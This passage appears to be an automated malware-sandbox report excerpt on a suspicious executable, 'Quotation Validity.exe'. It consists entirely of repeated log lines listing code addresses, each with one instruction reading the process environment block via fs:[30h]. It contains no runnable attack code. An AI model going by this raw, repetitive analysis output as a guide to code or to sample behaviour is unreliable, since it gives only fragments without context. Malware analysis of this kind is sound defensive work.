                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369148 mov eax, dword ptr fs:[00000030h]9_2_01369148
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369148 mov eax, dword ptr fs:[00000030h]9_2_01369148
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014361C3 mov eax, dword ptr fs:[00000030h]9_2_014361C3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014361C3 mov eax, dword ptr fs:[00000030h]9_2_014361C3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138B1B0 mov eax, dword ptr fs:[00000030h]9_2_0138B1B0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014451CB mov eax, dword ptr fs:[00000030h]9_2_014451CB
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F019F mov eax, dword ptr fs:[00000030h]9_2_013F019F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F019F mov eax, dword ptr fs:[00000030h]9_2_013F019F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F019F mov eax, dword ptr fs:[00000030h]9_2_013F019F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F019F mov eax, dword ptr fs:[00000030h]9_2_013F019F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136A197 mov eax, dword ptr fs:[00000030h]9_2_0136A197
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136A197 mov eax, dword ptr fs:[00000030h]9_2_0136A197
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136A197 mov eax, dword ptr fs:[00000030h]9_2_0136A197
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014461E5 mov eax, dword ptr fs:[00000030h]9_2_014461E5
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013C7190 mov eax, dword ptr fs:[00000030h]9_2_013C7190
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014171F9 mov esi, dword ptr fs:[00000030h]9_2_014171F9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B0185 mov eax, dword ptr fs:[00000030h]9_2_013B0185
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A01F8 mov eax, dword ptr fs:[00000030h]9_2_013A01F8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142C188 mov eax, dword ptr fs:[00000030h]9_2_0142C188
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142C188 mov eax, dword ptr fs:[00000030h]9_2_0142C188
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013951EF mov eax, dword ptr fs:[00000030h]9_2_013951EF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013751ED mov eax, dword ptr fs:[00000030h]9_2_013751ED
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014211A4 mov eax, dword ptr fs:[00000030h]9_2_014211A4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014211A4 mov eax, dword ptr fs:[00000030h]9_2_014211A4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014211A4 mov eax, dword ptr fs:[00000030h]9_2_014211A4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014211A4 mov eax, dword ptr fs:[00000030h]9_2_014211A4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AD1D0 mov eax, dword ptr fs:[00000030h]9_2_013AD1D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AD1D0 mov ecx, dword ptr fs:[00000030h]9_2_013AD1D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013EE1D0 mov eax, dword ptr fs:[00000030h]9_2_013EE1D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013EE1D0 mov eax, dword ptr fs:[00000030h]9_2_013EE1D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013EE1D0 mov ecx, dword ptr fs:[00000030h]9_2_013EE1D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013EE1D0 mov eax, dword ptr fs:[00000030h]9_2_013EE1D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013EE1D0 mov eax, dword ptr fs:[00000030h]9_2_013EE1D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136A020 mov eax, dword ptr fs:[00000030h]9_2_0136A020
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136C020 mov eax, dword ptr fs:[00000030h]9_2_0136C020
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141705E mov ebx, dword ptr fs:[00000030h]9_2_0141705E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141705E mov eax, dword ptr fs:[00000030h]9_2_0141705E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01445060 mov eax, dword ptr fs:[00000030h]9_2_01445060
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E016 mov eax, dword ptr fs:[00000030h]9_2_0138E016
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E016 mov eax, dword ptr fs:[00000030h]9_2_0138E016
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E016 mov eax, dword ptr fs:[00000030h]9_2_0138E016
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E016 mov eax, dword ptr fs:[00000030h]9_2_0138E016
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F4000 mov ecx, dword ptr fs:[00000030h]9_2_013F4000
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov ecx, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01381070 mov eax, dword ptr fs:[00000030h]9_2_01381070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139C073 mov eax, dword ptr fs:[00000030h]9_2_0139C073
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED070 mov ecx, dword ptr fs:[00000030h]9_2_013ED070
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F106E mov eax, dword ptr fs:[00000030h]9_2_013F106E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01372050 mov eax, dword ptr fs:[00000030h]9_2_01372050
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139B052 mov eax, dword ptr fs:[00000030h]9_2_0139B052
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F6050 mov eax, dword ptr fs:[00000030h]9_2_013F6050
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143903E mov eax, dword ptr fs:[00000030h]9_2_0143903E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143903E mov eax, dword ptr fs:[00000030h]9_2_0143903E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143903E mov eax, dword ptr fs:[00000030h]9_2_0143903E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143903E mov eax, dword ptr fs:[00000030h]9_2_0143903E
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014450D9 mov eax, dword ptr fs:[00000030h]9_2_014450D9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01375096 mov eax, dword ptr fs:[00000030h]9_2_01375096
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A909C mov eax, dword ptr fs:[00000030h]9_2_013A909C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139D090 mov eax, dword ptr fs:[00000030h]9_2_0139D090
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139D090 mov eax, dword ptr fs:[00000030h]9_2_0139D090
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136D08D mov eax, dword ptr fs:[00000030h]9_2_0136D08D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137208A mov eax, dword ptr fs:[00000030h]9_2_0137208A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136C0F0 mov eax, dword ptr fs:[00000030h]9_2_0136C0F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013B20F0 mov ecx, dword ptr fs:[00000030h]9_2_013B20F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0136A0E3
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013950E4 mov eax, dword ptr fs:[00000030h]9_2_013950E4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013950E4 mov ecx, dword ptr fs:[00000030h]9_2_013950E4
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013780E9 mov eax, dword ptr fs:[00000030h]9_2_013780E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F60E0 mov eax, dword ptr fs:[00000030h]9_2_013F60E0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F20DE mov eax, dword ptr fs:[00000030h]9_2_013F20DE
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013990DB mov eax, dword ptr fs:[00000030h]9_2_013990DB
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov ecx, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov ecx, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov ecx, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov ecx, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013870C0 mov eax, dword ptr fs:[00000030h]9_2_013870C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014360B8 mov eax, dword ptr fs:[00000030h]9_2_014360B8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014360B8 mov ecx, dword ptr fs:[00000030h]9_2_014360B8
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED0C0 mov eax, dword ptr fs:[00000030h]9_2_013ED0C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013ED0C0 mov eax, dword ptr fs:[00000030h]9_2_013ED0C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01445341 mov eax, dword ptr fs:[00000030h]9_2_01445341
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01367330 mov eax, dword ptr fs:[00000030h]9_2_01367330
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143A352 mov eax, dword ptr fs:[00000030h]9_2_0143A352
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139F32A mov eax, dword ptr fs:[00000030h]9_2_0139F32A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142F367 mov eax, dword ptr fs:[00000030h]9_2_0142F367
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136C310 mov ecx, dword ptr fs:[00000030h]9_2_0136C310
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01390310 mov ecx, dword ptr fs:[00000030h]9_2_01390310
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AA30B mov eax, dword ptr fs:[00000030h]9_2_013AA30B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AA30B mov eax, dword ptr fs:[00000030h]9_2_013AA30B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013AA30B mov eax, dword ptr fs:[00000030h]9_2_013AA30B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F930B mov eax, dword ptr fs:[00000030h]9_2_013F930B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F930B mov eax, dword ptr fs:[00000030h]9_2_013F930B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F930B mov eax, dword ptr fs:[00000030h]9_2_013F930B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0141437C mov eax, dword ptr fs:[00000030h]9_2_0141437C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01377370 mov eax, dword ptr fs:[00000030h]9_2_01377370
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01377370 mov eax, dword ptr fs:[00000030h]9_2_01377370
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01377370 mov eax, dword ptr fs:[00000030h]9_2_01377370
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov ecx, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F035C mov eax, dword ptr fs:[00000030h]9_2_013F035C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369353 mov eax, dword ptr fs:[00000030h]9_2_01369353
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01369353 mov eax, dword ptr fs:[00000030h]9_2_01369353
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143132D mov eax, dword ptr fs:[00000030h]9_2_0143132D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143132D mov eax, dword ptr fs:[00000030h]9_2_0143132D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013F2349 mov eax, dword ptr fs:[00000030h]9_2_013F2349
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136D34C mov eax, dword ptr fs:[00000030h]9_2_0136D34C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136D34C mov eax, dword ptr fs:[00000030h]9_2_0136D34C
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142C3CD mov eax, dword ptr fs:[00000030h]9_2_0142C3CD
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142B3D0 mov ecx, dword ptr fs:[00000030h]9_2_0142B3D0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A33A0 mov eax, dword ptr fs:[00000030h]9_2_013A33A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A33A0 mov eax, dword ptr fs:[00000030h]9_2_013A33A0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013933A5 mov eax, dword ptr fs:[00000030h]9_2_013933A5
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01368397 mov eax, dword ptr fs:[00000030h]9_2_01368397
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01368397 mov eax, dword ptr fs:[00000030h]9_2_01368397
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01368397 mov eax, dword ptr fs:[00000030h]9_2_01368397
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142F3E6 mov eax, dword ptr fs:[00000030h]9_2_0142F3E6
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013C739A mov eax, dword ptr fs:[00000030h]9_2_013C739A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013C739A mov eax, dword ptr fs:[00000030h]9_2_013C739A
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139438F mov eax, dword ptr fs:[00000030h]9_2_0139438F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0139438F mov eax, dword ptr fs:[00000030h]9_2_0139438F
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_014453FC mov eax, dword ptr fs:[00000030h]9_2_014453FC
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136E388 mov eax, dword ptr fs:[00000030h]9_2_0136E388
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136E388 mov eax, dword ptr fs:[00000030h]9_2_0136E388
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136E388 mov eax, dword ptr fs:[00000030h]9_2_0136E388
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A63FF mov eax, dword ptr fs:[00000030h]9_2_013A63FF
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E3F0 mov eax, dword ptr fs:[00000030h]9_2_0138E3F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E3F0 mov eax, dword ptr fs:[00000030h]9_2_0138E3F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0138E3F0 mov eax, dword ptr fs:[00000030h]9_2_0138E3F0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013803E9 mov eax, dword ptr fs:[00000030h]9_2_013803E9
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0144539D mov eax, dword ptr fs:[00000030h]9_2_0144539D
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0137A3C0 mov eax, dword ptr fs:[00000030h]9_2_0137A3C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013783C0 mov eax, dword ptr fs:[00000030h]9_2_013783C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013783C0 mov eax, dword ptr fs:[00000030h]9_2_013783C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013783C0 mov eax, dword ptr fs:[00000030h]9_2_013783C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013783C0 mov eax, dword ptr fs:[00000030h]9_2_013783C0
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0136823B mov eax, dword ptr fs:[00000030h]9_2_0136823B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142B256 mov eax, dword ptr fs:[00000030h]9_2_0142B256
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0142B256 mov eax, dword ptr fs:[00000030h]9_2_0142B256
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143D26B mov eax, dword ptr fs:[00000030h]9_2_0143D26B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_0143D26B mov eax, dword ptr fs:[00000030h]9_2_0143D26B
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A7208 mov eax, dword ptr fs:[00000030h]9_2_013A7208
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_013A7208 mov eax, dword ptr fs:[00000030h]9_2_013A7208
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
                      Source: C:\Users\user\Desktop\Quotation Validity.exeCode function: 9_2_01420274 mov eax, dword ptr fs:[00000030h]9_2_01420274
